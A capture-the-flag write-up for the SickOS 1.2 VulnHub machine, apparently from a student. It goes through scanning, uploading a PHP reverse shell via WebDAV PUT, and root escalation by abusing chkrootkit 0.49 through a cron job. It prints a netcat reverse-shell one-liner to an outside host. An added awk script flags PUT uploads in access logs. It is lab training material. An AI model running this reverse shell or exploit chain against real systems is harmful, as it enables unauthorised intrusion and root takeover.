SickOS 1.2 - VulnHub VM Challenge


How to crack the SickOS 1.2 VM lab without Metasploit.

tl;dr

  • Chkrootkit 0.49
  • Privilege escalation using a cron job.

Solved by: 01_susil

This is a Linux box with IP 192.168.12.9.

Initial Analysis

Starting with a basic port scan using the nmap enumerator.

[Image: Nmap]

The system is running OpenSSH and the web server lighttpd 1.4.28. Running a background check for known vulnerabilities.

Opening up the browser to check for more details.

[Image: website]

There was not much information on this page. It contained only a meme.

Opening up the Dirb Web Content Scanner to check for more information.

[Image: dirb]

The Dirb scan found a /test/ directory.

Let’s check out the /test directory.

[Image: test]

It looks like a WebDAV directory. WebDAV is a long-standing protocol that enables a webserver to act as a fileserver and support collaborative authoring of content on the web.

[Image: curl]

The PUT method is meant for “uploading” content to a particular URI, or overwriting what is already at that URI.
Here the PUT method is allowed! Uploading a php-reverse-shell should work.
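
A defender's view of the same PUT upload, as an added example that is not part of the original write-up: a shell function that reads a web access log and flags files created with PUT and then requested. The log lines, addresses and file names are constructed, and the common/combined log layout is an assumption about the server's access-log configuration.

```shell
#!/bin/sh
# Added example (not from the original write-up): find files uploaded with
# HTTP PUT and later requested, from a common/combined-format access log.

# Constructed sample log; addresses, times and file names are invented.
sample_log() {
cat <<'EOF'
192.168.12.50 - - [10/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 163
192.168.12.50 - - [10/Mar/2024:10:00:09 +0000] "OPTIONS /test/ HTTP/1.1" 200 0
192.168.12.50 - - [10/Mar/2024:10:01:12 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0
192.168.12.50 - - [10/Mar/2024:10:02:30 +0000] "PUT /test/upload.php HTTP/1.1" 201 0
192.168.12.50 - - [10/Mar/2024:10:02:41 +0000] "GET /test/upload.php HTTP/1.1" 200 0
192.168.12.77 - - [10/Mar/2024:10:03:00 +0000] "PUT /admin/x.php HTTP/1.1" 403 345
192.168.12.77 - - [10/Mar/2024:10:03:05 +0000] "GET /admin/x.php HTTP/1.1" 404 345
EOF
}

# Reads an access log on stdin and prints one finding per line:
#   UPLOAD <ip> <path>            a PUT that the server accepted (2xx)
#   FETCHED <ip> <path>           an uploaded file that was later served
#   SCRIPT-REQUESTED <ip> <path>  same, and the file has a script extension
put_findings() {
    awk -F'"' '
    {
        split($1, pre, " "); ip = pre[1]
        split($2, req, " "); method = req[1]; path = req[2]
        split($3, res, " "); status = res[1]
        sub(/\?.*/, "", path)                  # ignore any query string
        ok = (status ~ /^2[0-9][0-9]$/)        # only requests the server honoured
        if (method == "PUT" && ok) {
            uploaded[path] = 1
            print "UPLOAD", ip, path
        } else if ((method == "GET" || method == "POST") && ok && (path in uploaded)) {
            kind = (tolower(path) ~ /\.(php|phtml|cgi|pl|py|sh)$/) ? "SCRIPT-REQUESTED" : "FETCHED"
            print kind, ip, path
        }
    }'
}

# Run over the constructed sample; replace with a real log on stdin.
sample_log | put_findings
```

Any UPLOAD line on a directory that is not meant to accept uploads points to the same misconfiguration found here: PUT allowed on a path the web server also serves scripts from.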

Exploit

[Image: revshell]

Netcat is a utility which reads and writes data across network connections using the TCP or UDP protocol.
Set up a Netcat listener to receive the reverse shell.

[Image: shell]

We don’t have root access yet, so let’s list the directory.

[Image: ls]

[Image: cron]

Checking the cron jobs, I found chkrootkit and its version.
Cron is a time-based job scheduler. Users use cron to schedule jobs to run periodically at fixed times.
Chkrootkit is a shell script that checks system binaries for rootkit modification.

[Image: expl]

Create a file named update containing:

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.222 443 >/tmp/f

rm removes /tmp/f.
mkfifo creates a FIFO (named pipe) at the path /tmp/f.
2>&1 redirects stderr to stdout, so both are piped to the next command.
nc is the netcat tool, used here to spawn a reverse shell.
To make the update file executable, I’m using “chmod 777 update”.

Now the cron job will execute the update file every minute. Set up a netcat listener on port 443, the port mentioned in the update file.

[Image: root]

And that’s how I solved SickOS 1.2!